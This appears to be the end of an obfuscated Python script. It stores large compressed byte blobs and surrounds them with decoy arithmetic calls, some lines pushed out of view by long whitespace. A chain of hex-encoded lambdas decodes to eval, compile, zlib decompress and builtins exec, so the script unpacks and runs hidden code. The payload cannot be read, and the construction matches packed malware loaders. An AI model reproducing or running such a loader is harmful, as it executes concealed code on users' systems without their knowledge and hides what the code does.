\xc7\x1cw\xf0\x19\xae\n\xf9\xba\xfa)\xe1\xc3\xba\x03\x82m\r6u|\xeb\xe2\xd1\x95i\x14\xf4\x96\x03\xb2\xfe\x1b\xfaPR\xda\xf14\x8b\xaf\x1f\xae\x91z\xf0.\x9b\xeau\x0b\xc6/\x1c\x1f{d\xe5\x92\xe3\x17|f5Y\x86\xcfK\xd1\xd0\x88\xec\xc4v\x00h\xe6\xa9w\xf5\xd7W\xf6\x96*\xdfbo\'0um\x02\x9bp\xce3:\xdf\x80\x97\x83\x81l\xb7\x82a\xea^\xdfy@\x19m=5Q\x00\x0f\xfd+\xc0;\x04\xf6\xc5\x81\xc3t\x06X\x17\xa6ag\xf8$\xa6\xc0\xdc\x13l\x1b\xa3[\xf2\xb8\xc5Z\'\x8f\xc7\x92\xd2\xde^*\xac\xa7v\xc6%Q\\7\x13\x1c\x00\xc4\t\xc6$\xe2\x8f\xf0\x96\xf9ji[e\xb5F8\xaaw\x84&\xc5\x8d\x12\x8d\\)\x95\xd5\xdb\xeav+\xb7\x17Q\x91- V=\x17<\xcd\x98*\xf9e\x9ee\xb6z\x1e\xfd\x06\xc9\xfd\xb6\x0b\x10\x80t\xe6\x0f\xb3\xe2cd\x00\xa6%\xb5\xa1\xbf.\xe0\x81\x88U\x13<dX\xcc\xa2\t\x94\x13\x12\xc9,9\xa8\xa2\x89t\x0e\x8800\x1cv\xe1\xf8\xac\x183\x12;`\x1c.R\xea7G7\xb8Z\xa2\xa3\xe9f\xce\x10h\x1c\x1f*\xcc\x07z\xf0f\x90n\x1e\xae\xf3tZ\x91\xfc]\xcaM1\r~\x1e\xde\xf4y|wDj\x9f\xa6-"\'\x17l\xc3*\x8d\xc8\xfdf\xd1}\x87\xd7\xf1\xafoLM\xcc\xe1;\xf0\xa9\xd0[\xa0H{^\xba\xdb\xea\xee"\x10\xb7\xb0\xadBG\xdbA2\x08\xc5k+\xa9\x8f\xe2\xb3)n[\xf9\xdb\x15\xbb\xe7\xa7}h9+\x7f\xfcPd\x0fq\x81\xdc\xad\xe2\xb8\xbb\xb7 \xc7\x82\xba\x93s\xba\x8f\x8c\xd1wZH4\xfd\xc2m\xa3\xaf\x1e\x1c\xcd\xd4\x8f\x96\x95M\x96\xf5\xc8\xc0\x952\xac~\xcc\xea\xa5\xff\x04D\xac\x0bD\x92-\xa3\xa7\x9c\xc3\xcb_\xc55R\x84#\x19Q\x1d\x8d\xa0\xb6\x08\x1f777.37\xbbU\xc3\xc3z\xfe\xb2c\xb2E\x05\x92\xb0\x9amo\x81\xeaJ\xd2A^\t\x0b\xef\xd8\xf8F\x16\xe9\x9c\x15\xbe\x91\x0b\x9e\t]j\x11\x81\xee\xa9\x94\xbeTa`oj\xd5I~\x83j\x8e\xaa2\xc3\x81\xaf\xbcl\x91\tl\x93\x02\xc9a\x19 6\xab\xe6-\x18EA\t\x93\x8c\xfd-\xbc\xed/$\xc2\xa8\x7f.\xe9\x87h\xbb\x7fqq\xf1,\x96\xf0J\xae2\xcf\xd3\xc0\x0f:\xf2\x9d\x8b\xb7\xd5=\x80\x1b\x99\xda\xbbR\x86/\xb4E\xfa\x10\xb1wUJ\xdbFw\xe8\x93\xa8o\x85\xea\x1b\x8a\xf0\x99\x1a$\xfa\xa6\xba\r\x917\xb6\xf8\x08;)\xe2\xb2\xa1\xb3\xe1f\xc3N\xe6\xdd\xaa\x02\x84\x88\x12\xba4\xe8\xac\xab\xd3\x95\'u\xe1F\xa6\xd1>\xea\xbe\xadp\x87~\xe6\xd5&u\x9bd^]kj\xe7\x0fl\xed\x0b\x99\xd6\x0e\xe1S\xa7\x1e\x95\x8a\xd8\xa3f\x00\xb6\x84\xd7|\xea6\xd5\xed6\xbe\xaf\xa57\xe6z\xe5\xcd:4\xf7.\xa3\xfb\x92\x91\x813\\\xc4\xbe"\x13\xa0\xfb\x98\x88\x18\x00\xc8\x0e\xa36)\xcf\x88\x12_\\\x80<_ \x1c\x14?\\p\xde*\x0e\xb4{\x0cdO\x04\xf5\x83F}\x9a\x9dx\xf6\xaa\xedu\xf7\x1ea\xa5BZ\x94\xd2\x91s\xa5n\xa2\x19\xd9L\xba\xd5\x0bU\xe5o\x9d\x98\xea2z\x93\xba\re\xf4}\x18\x88\x8e\x90\xd4\xaa\xb03\x1a\xd6\xb4\xba]\x96v0\xea\x0c\x14\xa4\x86\x85\'\xb6,\x82\x1bJ\xaa\xdej\x01\xf8#\x8b\xbc\xcd\x11\xb3\xe3\xae\xa6\xa9\xd9$\xbb\xd17\x1aOI\xe1\x83\xc7\xaa\xf0\xd5\x85\x8e\x11\x8f\xc9\xd1\x83\xdd\xc4N\x97\xa8\xb8*?\xfa\nTU\xa3\xfa\xfa\xe2N\x1e\x93\xde5\xdew\x0b\x0f\x9e%L\xa9|\xc23\x04E\x9e\xf1\xf2\xac\x19\xdcU\xc2\x02T\xc2@\xce\x12a*\xf1\x15+\xa5mi\x8c\x1f\x81\xef\xbb\xe1\x96\xce.%\x8d\xd9V\xb7[\xc3\x7f\x0c\x7f\xe1\xfd\x93\xeb~\xa8+\xc6\xb0\xd6\xd6\xe0W\xa45\xf6\x98e?~/\xf0\x0c~\xeb\xea*G\xdaa|\xc1\xce93m i\xeel\x1c\x89\x0b\xabG\xd8bq\xabM\x11;\x0cO\x7f\x88\x86la\x80\xe2<N3v\xdf\x9d\xb1E\xa9\x83YAsh\x96\xd95\xfd\xdc\x9a\xd5=\x9d`,?\x7ff\x8d\x9a\x1fI}\xe9\x80E\xbbT\xacu\x81\x93=\xf6\xdf\xa0\xff\xee\xaao\xb3\xb1[\xb2<\x9c0_\xc2\x92E;\xb8$\xaf\xbf\xcfI\x05\xb7\xa3\x82\xccSA\xf5\xe8\x12\xafg\xeb\x80\xed$S\x8f\xbe"\xff\xc5\xf8\xaf\xaa\xc8\xf6\xd2UR\xdb\x08\xd4j\xd8\x01gi+\x00[%\xec\x96\x0f\xc3U\x02nu\x11\x97\x1bE\x89\xe5\x88\x00\xf8\xfes\x8cR\x07\xef\xd0\xa8\x07\x93\xf3(0i\xe1\xfc\xe3\x96\x9a\x8e\xd34\xb1F\xbb\x81\xf6IC\x97\\V]\xfc\xf5\x9c\xe7\x07k\x92Y\xa7,\x8a\xe5O\x9f\xd6\xc6\x00\xfc\x00\xb0,\x7f\x7f\n\xc0,>?\xdaL\xc8\xaaAQ\x11H\x15\x0e\x9a\xd1\xc5O\x00\xd8\xa4nw8\xb3\xcf\x02\xb7\xb6i>)C\xd0\xad?\x87\x14\xeb\xfeZW3K\x8b\xec\xce\x1b\xbb\xbc\xeb\xf4\xea`\xa3\x9d\xdc\xe8\xb2\xab\x89r\x070\xa9\xd9\xfd\xf2\xf6\xd5\xe8\xfb|\xf18\xbf{x5\xbf\xfd\xb6\xbc\x7f|5\xfd9\x1d\xbf\x99\xdf}\xfb\xfe\xf8\xe6\xdb\xfd\xfc\xee\xf1\r\xbe\xf7\xc3\xbb\xaf\xd37\xd3\x9f\xf3\xc7#\xec?a\xf3\xd4\x9cMUs\xfe[0\n\xd0bqz\xe4Ns?\xfd\xf7\xef\xd3\x87\xc7\x877\xcb\x87\xa2hx7Y\xde\xcaU\x1f\xe7\xb7S\xbd\xe2\xc3b:\xfdv4\x99\xce^}\xffv2^.\xff1\x9f\xbe\x99O\xae\xbf\r\xbfNO{G\xbfI\xc9\xc3{Y\xee:\x1c\xd3\x94X\xf6Q$H\xcaEZa;\x82[cR2\x98\x93\xb8\x91\xaf\xc5o\x7fL\x87\x93\xe9\xfd\xc3\xfb\xffs\xf4\xdb+\xefO\xec\xbc\x8a\xa4L\xcb^\x19jw[\x06\xb5`\xf5M\xf5H\x16\x04\x14l\xf4\xa3\xac\x7f\xfc\xd8\x93\xf3\xb8Hd\xe7\xc0Q;\x92\xeb\x0bT\xba\x18\xd8{e\xf2\xa3\xe2Fpx\xfd\x8a,t8\x9b|q\xcd\x9ek\xe6Ze\xbd}\x17=X\xf8\x83\xf7Tv\xd1\xab\xd3\x7f\xed\xd0\x92\x00\x8bC\x1eS\xe4\xde\x9dC[\x94\xf8\x9e\xa7ZDcM\x16}/\xf0\x84Z\x94\x85VN\xd1:\xe0\xa5l\x0f\x96\xb5\xc3\x07KI\x06\x02\xc8\x9f\xc1@\x86,u\x8bA\x0f\x06\x9fs:\xd9\xc5\x05\xafA\xbfX;T8\xb7\x02\x8b\xe0\x92y77\xe8%\xbb/~\x90q\xe4\x89\xab\x9e\xa1\xf7\xc1\x83\x99\x05l\xdc"\xdd\xdb\xb2w\xeb\xc0%]_\xa0\xd5\x95\xc7\xf52V\xf1j\x9f/\xca)\x85\xe5\x01p\x07\xb8\xf6r\x10\xd4\x0e\xa6!7\xe7\x18\x8e\xc5\rVd\x9d\xb6z\xae\xf9\xfa}\ra\xa7\xdf\xda\xb1\xb8M\x0c\x98\x81\x0c\x17\xce\x83{v\xd6\xf33\xd5k\x98p\xed\xc8\xb3\x81\x8c5\xb4+^\xc5\xd9\xa0w~\xc1\r\xcb\xad\xca\xd6\xb5z\xfb\xa0\xe5\x06\x0c\xc5\x84&\xc4\xb3\xe0\x05\x05\xbd\x12\xe6\xffC\xd1\x8b\xfe\xf3\xe8\xb7\xef\xf7\x8b\xebo\xf7\xcb\xd9|1}\xaf\xa4\xe4\xdd\xd7\xe9\xe3\t\xc3\x8e\xdd NE\xcc\xe4D\x85\xde\xe8\xa0t\xcb\xd3wt\xf4\xd1oO\x1e\xee\x9dw\xf5\xb0\xc7\xe9\xcf\xc7\xa3\xdf\x1e\xef\xff\xec\xc9\xcd\xcfF\xd7\x93\xc7\x87\xaf\xef\xdd\x01\xef\x1e\xbe-\xe6\x8f\':\x10\\\x94\x9a\x0b\xaf\xbd\xbd=\xfd|\xe9\x98\xfeB\x04\x88\xbe\xb8c\xce\xa4?\xf0\x17=\x85W\x97g\xa7\x9f\x9dU\x84\xa3o\x160\x8e\x00\xecg\xfeE\xae\x7f3\xfc\xdf\xcb\xe9c\xed\xf2b&\xd7\x11\x05\xae\x07ga\xa7\x81\x85@\x05\x11%\xd6\xeb:\'\x14\x19N\x8e\x8c\x9c~>?/t\xed}Q\xb8')

        Builtins._floor(MemoryAccess = -88996 / Builtins.Power)                                                                                                                                                                                                                                                          ;_theory.Absolute(Walk='XXWWXXWWWWXXXWXXXWWXXXW',_while=b';\xe5\xbb\xbb\xee\xf7\x87\xe9\xfd\xf5|\xb2r\xe1Oj\xa6\xffT\x8cjz\xe8\xc8\r\x9b\xa8\xf0\x86.\x1e{\xa0\xaf:\x9018\x18\x9c~\xe6)\xe3\x86\x01\x8d\xd8\xbb\x01\x1f\xba\xee\xf4\xe7x\xfa\xedqc\xc3\xbbT\x00\x9c\x02@\x12\x018\xa6\xed\xf4\xb3\x0bW\xd1\x14\x8a\xc5\x9a\xde\xc8\xa5\xf3\x19,\xee\xd3i\xc9\xa3\xcb\xd3\xcf.\xe73\x86\xc0\x19B\x10\xce6\xb5\xbe\x1b\x86\x02*\x06\xd0\xf8%\xb5\xfe|\xae\x0e\x1b\x0b\x1e\x87\xfc\n\xe6zmI\\P\xb0\x99\xc4^\x9e~\x86\xed\xb9\xcfFh\xb1F\xe3\xaf\x8f1\xb4\xf1\r\xe8]_\xba?\x151/\xa3\xd3\xcf8\xdf\x85@ibU\xdek\xffBoB^\x7fI\x11\xb0\x81\xdb\xd0\x98>uR\xc2\xab\x98\x0c\x1f\x87\x98\xe04\xe3\x824v\xc1\x1b\xff\xfc\xd9s\xb7GC\xf5\\\xd0:+\xf0\x9d\xb8\x0b\xaf\x8a{li\x03\xf7\xee\xf0\xdez\xe7\xe7\xee\xb0\x0b\xed\x83\xf4\xa1\x03\x14Y\xd5\xebi\xe8j=}\xf2\xd2jK\xbf\xa8\xff\xc9\x07c\x15P\x83O=\x9d\x97d\xb6\xa3\x0f\xd5\x94\xa3\x8bw\x8f\xd3\xf4>\xb8\x99L*;\xcd\x1c\xd5]\xf2(e"\'\xc4j\xd9\xc38]\xcc%X\xf8f\xe1F-\xbeT\x1ds\xd1\xd9\xd2\xb1\x1f\x98\x9bz<\x18\x99(\xdf8R\x85\xaeOU\x17:O\xbb\x15\x9e\xe3{\x98\xcb$\xa3\xcf\x99\x17\x0c\x83y\x86a\xb15\x05\x93\xbb\x9b\xde\xa5{\x06}"\xd7\x16\xb8\xfc\x99N\x94|"\xaa\xcb/\x89\xbb\x17\xda\xfa\x9c9\t\xb6\xc1\xf2\xb41w\xb6\xd9^_Y\x86\xc2_\x14\x17\x07\xaf\xcb\x99\x12\x18B\x8fVz\xae\xa9>|T\x1d\xa6c`>\xb8wWL\x1d\xfcZzn0\xa3\'hW\x92\xce$\x83\x17\x7f=\x19kT\xa5\x9cx\xdc\xeb\x97s\xb8Y\xccy\xd4\xa9s\x1d\xd5w!\xc3.m*\xaf@\xdd\xc2Sf\xa0\x93\x0eO\x9bJ\x13\x84Zc\xbd\xe7\x88t\xd1\xa9\xa4O\xf0C/%\xad\x18\xd2\x89\t#1\xe8\x15h\xf0\xaa\xbc\xe5\xb9j\xa0\x88\xe5\x8c\x95#P9\xb4\xd2s\xa3\xb3 \x89\x8e\xf2\xf8\xad\xa0IM~\xc8V\xaf_\x84\xb4\x97\xc3\x92\x7f1\xce.dZ\xe51#/\x12/\xb5\xc7|.&c\xc9]\x8f\xbe\xb7|\xed\x98\xe7\xd7\x0e\xe1Z\x9a\xa5\x98\xb6\xe8S\xd6\xf0Q\xb0=l\x08\xee\xd0\xc2\x14\x0cx\xe5\x0c\xacL\x91\xce]9B\xe1i\xd1\xa5Y\x0e\x90yY\xa2\xea{\x97Jq/U\x11\xa6}\x94\xa6\xf7I9+\x7f[>\xd0\x9c\xea\x98\xe3\xe2V\xeb\x93\xf3\x1b&J\xf8q\xd3\xf4\xf2\xe1\xdd\xc3\x9f\x0f\x8f\xd3\xdb\x93\x85t\xe5\x1b\xe75\xc7\x92\xc8\xcd\xe9\x11\x0b/\'\x0b\xe1\x90\x16\x1a\xdc:\xa7=\xc2\xe9\xbeg\x19\xe7\xa4\xaf\x93c\x89\xfa\xd3?=\x9a,\xde\xe3h\xa9"\x16\xe9s\xd0jao\xc0@\x9e\xf7I\x1cX\x8c\xddY\xe6\xee\n7E8\xed\x9ce\xa1\xc9\xf5p<v\x92\x8b\xa3\xc4.\xae\xb2|TY9\xfd\xfc\xe9\x937\xa7_\x15\xe4\xefJI\xb8{F\xa6>s\x9ee\xf8B\x8b\xd3\xcf\xa0R\xf8\xe3\x01\xca\xdd\xf6\xcbQ)\xa8\x0cX`]\n\xbc\xbe\xa0:\x05\xbd\xbet&G\x82\xf1Po\x8etj(\xf8Q\x07\x80\xd4\xeb\x97t\xaa\x18{\x0b\xe1(\xd5\xd6\x1c\t\xc7\xe3\x11\xe7\x9e\xf4Ha\xd5\x99(\xbe9\xd2\x07/\x02\xfd\xa5\xc0\xc9\x1eo\x8e\x1c\xab>\x10\x93\x158\xa5\x9e\xca\x1f\xc5\x10W\t\x04\xb5\x07\xf2\\\x18{L#{\xce\x9eR\x19\xa4\x1f\x88.\x15\x03M\xa74\x9e\xc60\x8axD\tUd\xc9\xe0\xcd\xd1\x0f\xe5-\x94\xd3\xe0\xf5\xde\x99\x8c27#\xc8B\x9ej\xc04`\xe0n\x07lt\xc0?4cx\x93\xb4c\x92\x88\x028\xbeZQx\x8a)\xee\xaaW\xbe|\x7f\x02\x04\xff\xcd}\x97\xc5\xed\x1b\xe1\x15{W\x8a\xdf\xe3\x0e\xb8\xc2\x0b\x146\x8e\x97\x8e\xe2\xf7{\x97\x05\xbb\x10\x95\xf7\xc03\x89\xc8\x15\xdc{D\xbf\x81\xae\xd3\x93\x19\x0e\x1c\x0c\xd6\x16<\xa8q\x80L?L\xe9\x9c*\xa4WN\xebJ\xd2\xde\x1c\x89^\xe0F\xa7I>\x17FaO\xd9G\xa7\xb3+\'\x8a7GN\xeau\x935\xcb\xb2\x97\xcaWzK^\xd5^"4O\xbb\x0bHT\xcfcQ~\x96\xdc\xd6\x9b\xa3\xff<\x9a\x8d\xaab\x80\xbe\x17\xa5\xcc\xda\x8d\x9f\x96\t\x94\xf7\x1b8\x81\x8c\xa7\x15\xe9u\xd4(`\xbf\x85/\x90\xa9\x14-F\x7f_\x8e\x1e\xa7w\xd7t\xe1\xd9\xa8`\xdf\n\x01!\xf2\x997f\xdf\x84\x1fd\xea\xcer\xd4\xf9\xb9\x8e\xfb\x82t\xab\xc8L<\xb4\\\x85Y\x0b\xd1\xbe\x10\xbby4\x9b\xdfM\xae\x99NV%\xa6\x1b\xd1\xd00S\xca\x0c\xea\x1a\xc9\x87\'\xe1\x87\xc7\xf7\xc5y\xdc\r\xa8V\xe2C\xc9*}\xfc\x00i\xa7"\xec\x14L\xf5\xe5\xe5\x97\x92Y\x0e\xe4\xfd`t\xa0\xcf@\\(&\xda\xe2(\xbau\xc7\xf0\xd7/-\xd2\xb7\xb0?K7\xd0\xd1qO?\x17IY\x9c"\xc3\xdd\xa3^\xfac\xa1\xdf\xd0{\xfe\x88{.$\xf1B\xabq\xf7\xe5h>{\xe5^\xd5{n!\x87\x89 "&\x86\xda\xd1\xabWP}\x9dx\xf4\xbaH\x1b\xa1\x13\xcd\xeej\xa9(\x19\x8dM\x1e\x8cM\x16K\xa2T3u\xe9Q\'\x000H\x0c\xa7\xbb\r$9.C\x1d0|\x01 \x84\xe0C\xcf\xe1\xe5\xd0nM\x92I\x03\xcf\xeb\xd3\xa3\x87\xc5\xfbZzy7\xeb\x1f\xfd\xf8\x83d\x8cW\x8e%s\xe4\xd1\xb1i\x18\xd8$\x94\xdd\ro\xebr8+\x1bd\x1e\x10\xb1\xf5\xf4\xdd\xcd\xc3\xf2\xee\x84;\x86\xca\xbf\xfa\xff\xe5\xf3Oe\xfd~\x16\x17\xf9\xf2\xf9\xd2\x9b<\xdc\xb8\xf0\xe4\x0fn3fnx>\x18\x9c\xf5d>e\xe6\xc4M\x11\xcc\'\xe3[\xee\x13\xa5\xa4p\xdf\xcc\xa8/\x1c\x7f+\xdc\xd9\x92%8\x16J\xc1\x16\no\x80\x99\xd5\x01\x011\x93@\xec\xb8\xe3\xb4E\xc7$L\x16\xf3ZN\x8c\xf0\x99o\xd5\x17\xf5\x16\xfd\x024\xd0\xcd\x96\xc2\xef\xfdp\xd4Q\x99\xbe^q\xbc\xfe\xf0\x92*\x7f\xf0\xa8\xa0/\x95|\xec\x89\\%\x8c\x88\xb0\x7f\xe7,<B\xd3\xc2S\x11\x984QB\xb9\xc69;\xeb\x15\x06\x92O\xc5d\xc1\xd3\xc9oL\xa5\xe7\xe2\x919wt\x1a\xa2k\xcf\x93\xbd<\x9c8at\xb5\xe1d\xb6`\xa6\x82\xe6\xdcr:/u\x9e,\t|*e\xb2Bu\x00#M!\x02\xfe($C7w\xfc\xa6\x14\xc4\xc7\x03\xed\xf1\x9b`n\xe2\xacPTa@9\xee[8\xee\xa5\x88\xe3\xfc\xdf;W\xb9\x9a%\xe2s\xf6\xf3\xc6\xccx\xa1\xf7\xa5\x91\x06\xcan\xd1\xdc[\x8a)|\xa6\xa5\x10/\xc7`8A\xb0\x94C\n\xb6Q~\xa4S\xe8\x8dW\x1c\xf1\xa8[\xa88\xf3I-V*\xd7\xf0\xc5x\xf6:s\xa9v\xf9\x05\xf6\nb\xebV>\x88pU2\xf0wES\x83}b%\x8b\xe3>\x96\x92G\tcDN\xe8\xd8\xf73iCh\xf8\xb4\xd5\x0b\xe1\x83\x9b\xdeM\xceWegA\xab\xa8b\xb2\xd0\x1d\x08\xef\xe7Z)\x10m\xe8RT\xa2\x8e@\xf7X\xaedU\xc8B4<\xfcb\x9d\x18T\x92\x86\x1e\xeb+\x17\\\xc3QZQf\xceE\x0e,$\xc8O\xc5F\xaf\xe8\xc6e\xef\xba\xbaz\r\xea\xf4\xba\x90\xb5"\x1d[\xaf\x85$\xbc.\x95u\xc5LJ\xeb\xac\xbc\x90A\xc4\xc3\x08\\\xfdy\xaf\x10%\x0b.\x15\x15\xe5}\xa3\x03\xf5\xe5\x10\xeeQ\xf4\xdb\xd3V,\x15R\x8e\x19\x129\xe7gM\xce\xb9\xb9\x11Zy\xc3+\xf2\xb0\xdb$\x1dO!9z\xefu\xbcB3\xce\xbd\xf0\xb5\xc7S\t\xac#\xda\xe7\xf5\xcf\x92\x89\xa8\x0cS\xf7\x0f\xc6\xc3EAp8D_T9\x17\x05\xf3!\x9c\x8d\xbbe\x16\x9f>;\xed:w6\xb1\x85}y]P=O\xad\xb1(.\xae\x19\x96J]\xa9\xc8>\xaa1-\xb807m\x16\x17ws\xcc\x8d\xf0U\xae\x93P\x97\x11\xcd\xd5\xc2\x13X\xf8\xcat\x1f\x9cKAB<\xfa\xa2\ncm\xd8\x85\xb4\x1f\xc9b?K]\x9a7\xf5\x14]\x87X1\xcf\xa4!k_J\xcd\xeb\xa7\x82%/\xa0\x06\xae\xa0\x04\x15A\x8a5\xe0\xc2u\xf7/\x9c&\x8f\x98\x0b\x92\x12\xdf\x97\x06\x0b\x91\xd6\xcfD\xf9\xdeS-yi\xf9\x1a\x8fOk\xda\xd0\xd1{\xbf\xe9x\x15\xda\xed\xfd\xb8\x0e\x9b\x8c\x88\x7f\x88\xd31\xf3\r\x81E6\xc0&\x8e\x1btS\xc4@<,^;j\xda\x17\xb2\xcaz;Vd\x1e\xfd6[\xde\xbf\x9a\xbf\x9a\xdf\xbdbk\xe1\xc9d\xf1\xe6-\x13f\xa6HLO\x99m\x06!}\xf3V\xb1u\xd5l\xa6Z\'X\xfcZ<\\J\xffy\x14\xa4cb\x97"a\xab\xc0d\x01\x1dj\x08\'\xfc\x80\xd3/&\xfc\xe0\xb9\x9d\xd88j\xe2\xcc\xf7fz7y\xaf\\\xae*\x1f\x85\xceS\xbb\xfc\xc6\x06\xcc\x13w\xafU\r-\xdf\xf7\xe9\xd1\xff\x03\xdd\xee\xe3+')

        _theory(Substract = 23172 + 72085)._floor(MemoryAccess = 12379 - Builtins.Power)                                                                                                                                                                                                                                                          ;wwwwwxwxxxwxxxxxwxwx,XWWXWXXWXXXWXWXXWWWWWWXXX,IIIlllIlIIIllIIllllIlIIl,O0OOO0o0OO0O000oO0,DDooOooooDoODoODO=(lambda SS2SS2SSS222S222SS2SSS2S:globals()['\x65\x76\x61\x6c'](globals()['\x63\x6f\x6d\x70\x69\x6c\x65'](globals()['\x73\x74\x72']("\x67\x6c\x6f\x62\x61\x6c\x73\x28\x29\x5b\x27\x5c\x78\x36\x35\x5c\x78\x37\x36\x5c\x78\x36\x31\x5c\x78\x36\x63\x27\x5d(SS2SS2SSS222S222SS2SSS2S)"),filename='\x6f\x6f\x44\x6f\x6f\x4f\x6f\x4f\x44\x44\x6f\x44\x4f\x44\x44\x4f\x4f',mode='\x65\x76\x61\x6c'))),(lambda SS2SS2SSS222S222SS2SSS2S:SS2SS2SSS222S222SS2SSS2S['\x64\x65\x63\x6f\x6d\x70\x72\x65\x73\x73']),(lambda SS2SS2SSS222S222SS2SSS2S:SS2SS2SSS222S222SS2SSS2S(__import__('\x7a\x6c\x69\x62'))),(lambda:(lambda SS2SS2SSS222S222SS2SSS2S:globals()['\x65\x76\x61\x6c'](globals()['\x63\x6f\x6d\x70\x69\x6c\x65'](globals()['\x73\x74\x72']("\x67\x6c\x6f\x62\x61\x6c\x73\x28\x29\x5b\x27\x5c\x78\x36\x35\x5c\x78\x37\x36\x5c\x78\x36\x31\x5c\x78\x36\x63\x27\x5d(SS2SS2SSS222S222SS2SSS2S)"),filename='\x6f\x6f\x44\x6f\x6f\x4f\x6f\x4f\x44\x44\x6f\x44\x4f\x44\x44\x4f\x4f',mode='\x65\x76\x61\x6c')))('\x5f\x5f\x69\x6d\x70\x6f\x72\x74\x5f\x5f\x28\x27\x62\x75\x69\x6c\x74\x69\x6e\x73\x27\x29\x2e\x65\x78\x65\x63')),(lambda liljiiiilijljjlilj,SS2SS2SSS222S222SS2SSS2S:liljiiiilijljjlilj(SS2SS2SSS222S222SS2SSS2S))
        Builtins.Calculate(_run = Builtins.Power / -45643)                                                                                                                                                                                                                                                          ;O0OOO0o0OO0O000oO0()(DDooOooooDoODoODO(XWWXWXXWXXXWXWXXWWWWWWXXX(IIIlllIlIIIllIIllllIlIIl(wwwwwxwxxxwxxxxxwxwx('\x76\x61\x72\x73'))),_theory._hypothesis(_divide='OOoo0o00O0ooo0ooOOoO00')+_theory._hypothesis(_divide='oDOooOOoODOOODDDoOODOoOO')+_theory._hypothesis(_divide='XXXWXWWWWXWWXWXWWX')+_theory._hypothesis(_divide='NMNNNMMNNMMNNNNMMNMNM')+_theory._hypothesis(_divide='S2SS2S2SS222S2S2SSS2S')+_theory._hypothesis(_divide='XXWWXXWWWWXXXWXXXWWXXXW')))

    except Exception as Statistics:
        if 126987 > 6091310:
            _theory.execute(code = _system(Statistics))

        elif 331912 > 4466547:
            _theory(Substract = -85685 * 27191).Calculate(_run = Builtins.Power * 46062)
